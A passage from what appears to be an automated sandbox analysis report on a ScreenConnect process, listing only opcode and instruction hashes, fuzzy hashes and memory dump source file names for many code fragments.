                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2a19353c6a4bb3e6e8c78c58c5968e453addccff1cfcce2d58ef1f1f26e02723
                                                                                                                                                                                                                                                        • Instruction ID: 1aaba9098f7d635d7d632a9d1f0cfc5317591a0d1bc83949c1485f337ee904f7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a19353c6a4bb3e6e8c78c58c5968e453addccff1cfcce2d58ef1f1f26e02723
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5841C031E006098BEB15EF68E894B6DBBB6EF84310F04C159D90A9F346DF7498469BA1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 980737ed80a8e4e9bfceee3c4f7fa8d7e713ababdadbed2e00d0e2e3f451857e
                                                                                                                                                                                                                                                        • Instruction ID: 71b93f480717e005be360b1de500672dbf6ce5e3c1a65a333f5f430e55a92e2d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 980737ed80a8e4e9bfceee3c4f7fa8d7e713ababdadbed2e00d0e2e3f451857e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D416D74A007098FEB74DF29D844A5AB7F1FF88310B108A68D496DB7A1DB70E845CF95
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: dc311b76bad1f3d2e64f2b60455905e701f559c51b7aab3bef4867b0890d3340
                                                                                                                                                                                                                                                        • Instruction ID: 0fc0d790ea77f2439fbf1c8fe630dab316f7a134b29adab452ca6e7e7325fb91
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc311b76bad1f3d2e64f2b60455905e701f559c51b7aab3bef4867b0890d3340
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B418830B106058FDB54DB39D894AADBBF2BF88610B1081ADE447EB3A0DF719C05CB91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: bd27a7b5bf749168748811bd99422a15df9a2a11903e484f0ab5ede4875d0ad1
                                                                                                                                                                                                                                                        • Instruction ID: b486f53cb4e49fbb2b4a5a172bfe98d405b82d792422ff15d747b9d375dc1395
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd27a7b5bf749168748811bd99422a15df9a2a11903e484f0ab5ede4875d0ad1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E318B31B002058BEB149FA9D498BAFF7F6EF89314F149869D506EB790DBB19C009B94
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 342511768c3d88f16a5ee8274caddde5f4a48c68c4ce089aad8112d47b7df073
                                                                                                                                                                                                                                                        • Instruction ID: 9bddcac0f26c7e72d2b30c46fc394cd5ff05253f76da611226f970f66aab2036
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 342511768c3d88f16a5ee8274caddde5f4a48c68c4ce089aad8112d47b7df073
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88310370F002498FDB45DBA8D8506AEFBB2FFC9200B1480BAD448DB382DB319D02CB95
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4b76d89b6b9966b8c33cadadb8b9019be044259d2a51152fad6891eb3b31d7a1
                                                                                                                                                                                                                                                        • Instruction ID: c09b7e0f9e644205464cd6f318d0dc2ab01220ae834066ca90ea0879426a2612
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b76d89b6b9966b8c33cadadb8b9019be044259d2a51152fad6891eb3b31d7a1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF314A30A00705CFC760DF29D884AAAB7F2EF89320B144A5CD596CB7A1DB30E945CB91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: dae672411c4125f998c4623c479bb09248868b0653045f16d5f7ba19acbd25fc
                                                                                                                                                                                                                                                        • Instruction ID: 32134010bf2bf022f47ab6819fac486d0e59ba10315f759fbbda9a6f3faa92e3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dae672411c4125f998c4623c479bb09248868b0653045f16d5f7ba19acbd25fc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A112632B00A015FD351D62C9D51BA7BBE79FC6650B69C5A9F099CB241EA32DC028390
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a7ca3e89421f0c6288db2557ff6489242983f57e8c28e43019bd08b6ecbf7972
                                                                                                                                                                                                                                                        • Instruction ID: 5a157cc724ba328a1bb901ff0e578581857dc5368055c7a74c9459e889142bc4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7ca3e89421f0c6288db2557ff6489242983f57e8c28e43019bd08b6ecbf7972
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8221D5717402055BE700EB78EC51B6E7BE2EFC5240F04C529E459AB351DF74AD069BE2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f5222b619fd4a0d592ad4039f5de4b4984cf58e02dfecae1394d01d112fc8b7f
                                                                                                                                                                                                                                                        • Instruction ID: 357a477535c863211290daa90ee40dc2f5e4db6c8b62458533220a47a3bbca6e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5222b619fd4a0d592ad4039f5de4b4984cf58e02dfecae1394d01d112fc8b7f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C2151316007098FD774CF69C84869ABBF1EF44320B108B6CD5929B6A1DB71E989CF90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: acba1eba09e70d5d40dc9666570cab9b4886f6d144eede10f3857590dffe6157
                                                                                                                                                                                                                                                        • Instruction ID: 1b4ea1f89b7a561a74b2e33c53dbb5281e2ba2d04ed3f508a0288b470ddbd518
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: acba1eba09e70d5d40dc9666570cab9b4886f6d144eede10f3857590dffe6157
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD11E271B402055BE700FB68EC41B6EB7E6EFC5250F40C529E509AB350DF70AE059BE2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f904dcf80e52cfd3025bfc0742f2eae9418373dda31080436f82035b7f1f585c
                                                                                                                                                                                                                                                        • Instruction ID: 24ecaf10a1e2ce2c5bc82e78bce15fdc3b9886bfacd27841864aa36983e95627
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f904dcf80e52cfd3025bfc0742f2eae9418373dda31080436f82035b7f1f585c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6110632F093514FCB028B78D8944AABFF4EF8624431589EBC046CB263DBB19C078794
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c8d89c96415b98ea1219460e464b345e2952eaea379e44493d198096477781eb
                                                                                                                                                                                                                                                        • Instruction ID: ff2fc4f8103f7876112fc184bc36872830f15fdd1f17f2351be11b0d9dd071eb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8d89c96415b98ea1219460e464b345e2952eaea379e44493d198096477781eb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E01186329012099FCF01DFA4D9419DEBFF1EF49304B118455D508BB261D771AA06CB90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0d7eb1cba259387720b66132d58ad45ece1cc1f1bf2879817fb58dc7929e785f
                                                                                                                                                                                                                                                        • Instruction ID: 9fea07a6d87581bf1caf23dd9c4d79c1d77c7f3f686fcc0342d2d3ac1cb64bcc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d7eb1cba259387720b66132d58ad45ece1cc1f1bf2879817fb58dc7929e785f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E61146319001499BDB02DFA8D884ADCBBB2BF85204F59C554E045AB126DB71A986CBE1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4721a7bfa1f93f3abdaec32f0b010f585542ffcaa7207ed3f7cda73f76e0d6f4
                                                                                                                                                                                                                                                        • Instruction ID: e408ef38bce421750709a755d05751caeb3848e421f89e77147343540ae3150c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4721a7bfa1f93f3abdaec32f0b010f585542ffcaa7207ed3f7cda73f76e0d6f4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F011163590120A9FDF00DFA4D9409DEBBF5FF49314B108559D509BB261D771AA06CB91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 94714d679503824f78a96ca4231e1653d484c20192c0e9b8935f0d830c55ddc8
                                                                                                                                                                                                                                                        • Instruction ID: 8ca1076749e4ed805c4b061e9753451055b4efe4f9656ceb74d296e7f3643312
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 94714d679503824f78a96ca4231e1653d484c20192c0e9b8935f0d830c55ddc8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D401DF30A09248CFC7869B78D8199297FF2EF4611131580EBE486CB2A2DB359C02CB15
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1750321186.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_fcd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2d807d076620dfa6b6882a1c64c01bd252d6e259f2e4b6ed6588e26be1288854
                                                                                                                                                                                                                                                        • Instruction ID: de96ab69a87fe59f6970ae186991c37441ae0ef9d29f95ffafcedd032ef9512d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d807d076620dfa6b6882a1c64c01bd252d6e259f2e4b6ed6588e26be1288854
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 590120714443419FE7104E19CD81F6BBB98EF41334F18C43DED450F146C2759845D6B1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1750321186.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_fcd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 266d1da07cc348e5aca604716831e0949cc006f41e360ccfe1133d7f5f1eb543
                                                                                                                                                                                                                                                        • Instruction ID: e5d8e81353c3a65571dba32e7346f53ca3aa08617677528c11f68345bd7344eb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 266d1da07cc348e5aca604716831e0949cc006f41e360ccfe1133d7f5f1eb543
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D801406140E3C05FD7128B258D94B56BFB4EF53224F1981DBE9888F1A7C2695849C772
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: bc9e3c642bba172bf809e074d7bd0788f54fd9bfbfae784cc014b407e477391d
                                                                                                                                                                                                                                                        • Instruction ID: 5812f87472f6a2e6a4ec2afc899a1889a1934f57c8d903271af3c01a7465bd90
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc9e3c642bba172bf809e074d7bd0788f54fd9bfbfae784cc014b407e477391d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0CF08C77B0C2046FD728CABEA40069BBBDEDBC4220B14C07FE59DC3781E931A5008768
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a89dc99842eaaffc2bcfdbc706c660e4f36623acee6830feb9db7daa4b939bef
                                                                                                                                                                                                                                                        • Instruction ID: 4de3f378e40f8417f65f9a8041e46c469a26df8b490fb0f4de18c2f05ae1ec14
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a89dc99842eaaffc2bcfdbc706c660e4f36623acee6830feb9db7daa4b939bef
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83F0EC76A0D3C06FC326877968115ABAFEACEC2220B09C0BFD0C8C3282E8205912C325
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e5998c549f0f19fac355c3358c83399b4293aee2216d39dcf4bb1a9ea8baccf6
                                                                                                                                                                                                                                                        • Instruction ID: 47770c1017ee6264381406325eaca505ee4e9255a48a6c872e112fb91d9c895c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5998c549f0f19fac355c3358c83399b4293aee2216d39dcf4bb1a9ea8baccf6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93F02B35A046414FCB13A77CE85055D3BE2DEC6640304C0AED4C6D7386DB6098079B81
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: afdb1b97042d626c13f58ea943c8d00614b0061bd8ff94838bbf8ad0dc1e8f61
                                                                                                                                                                                                                                                        • Instruction ID: 814138b071bf209289da677f6131c6246e8b34056c1c5dcb03e482802526a894
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: afdb1b97042d626c13f58ea943c8d00614b0061bd8ff94838bbf8ad0dc1e8f61
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5F0246310C3D18FD3239778A8613A97FE1DE9311038989CBD0C28B597D799B90BD362
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6e1ef0f8f09e4be23ad8f70b175788c003f097f64ece85f1b884399fef8a976e
                                                                                                                                                                                                                                                        • Instruction ID: 7cc772fcd348bf415ffd7dacce08961ccf272a8696f82f2cb7bda11636bfd4d9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e1ef0f8f09e4be23ad8f70b175788c003f097f64ece85f1b884399fef8a976e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33F02222F065815FCB01826C6C555E5BFEA8E4B16032DC5E2F4A9CB252FA16CC038381
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 17ffde8deec0c32cda9e2790e6062b049000f5de88be141a2bf2e2cafcafe274
                                                                                                                                                                                                                                                        • Instruction ID: dcd2ae4c7bfbd6bb9b53287afe82e32ed71e600f8aa6fc916bfde695ec5b27bc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17ffde8deec0c32cda9e2790e6062b049000f5de88be141a2bf2e2cafcafe274
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61F0E5353061885FC3015778A8194AD3FE6DFC611131582AFE556D3BA1CE254C03D761
Memory Dump Source
• Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 11a602ce65afd5b39ac42100596bea855b1f4fcb6b603ad1bba56e6ab8e177e2
                                                                                                                                                                                                                                                        • Instruction ID: 1ebe3faac70ea13350193247dfbb0e61cbf08d80c5538ed50708a1319eee4e30
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11a602ce65afd5b39ac42100596bea855b1f4fcb6b603ad1bba56e6ab8e177e2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14F0E5327043585BD7145AAB7C4862A7FEAEBC9761B18417FE20AC3351DE299C0583A6
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 5d61b8a9b7c437374d4c366c2837a000033a6bc4014ae4a6028a6a86f8257c25
                                                                                                                                                                                                                                                        • Instruction ID: c56d28f5317dc44d9c0dac68218bdcc36739bf494a41efe8504f4826e06b2f1f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d61b8a9b7c437374d4c366c2837a000033a6bc4014ae4a6028a6a86f8257c25
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89F06536B006069F8712AB6DE81495E77DADBC6A50344C42EE446C7385DF71EC03ABD5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c9f9cc9e9c2fb24e82485ef2016e25ee6d5132270d751229432eb3874728f8ae
                                                                                                                                                                                                                                                        • Instruction ID: da9da1cbd2a9fe43a45b5edba5d37361ccac91cca6db4f744aeac81746e07f84
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9f9cc9e9c2fb24e82485ef2016e25ee6d5132270d751229432eb3874728f8ae
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7CE086327003189797145AAF788852EBAEBFBCCB61754413EF60EC3350DE759C068395
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f581084be56c21199217a0eb4ebd9998410098f123fdc85b1f18fe8d55e50076
                                                                                                                                                                                                                                                        • Instruction ID: 2375864ff2f780b03d4626966d9edf0197417458ad93773d274482ac22dd6ce7
